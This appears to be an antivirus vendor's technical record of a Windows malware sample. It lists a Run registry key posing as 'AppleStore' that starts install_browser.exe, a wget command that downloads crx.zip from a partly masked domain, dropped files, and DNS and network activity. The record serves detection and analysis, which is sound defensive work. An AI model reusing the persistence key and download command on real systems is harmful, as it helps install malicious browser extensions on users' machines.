Техническая информация
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'AppleStore' = '"%APPDATA%\install_browser.exe"'
- '%APPDATA%\wget.exe' -O "C:\Fei\61432\crx.zip" "http://ki###urk.org/eklenti/crx.zip"
- '%APPDATA%\install_browser.exe'
- %APPDATA%\unzip.exe
- C:\Fei\61432\crx.zip
- %APPDATA%\install_browser.exe
- %APPDATA%\wget.exe
- %APPDATA%\unzip.exe
- %APPDATA%\wget.exe
- %APPDATA%\install_browser.exe
- 'ki###urk.org':80
- ki###urk.org/eklenti/crx.zip
- DNS ASK ki###urk.org
- ClassName: 'Indicator' WindowName: '(null)'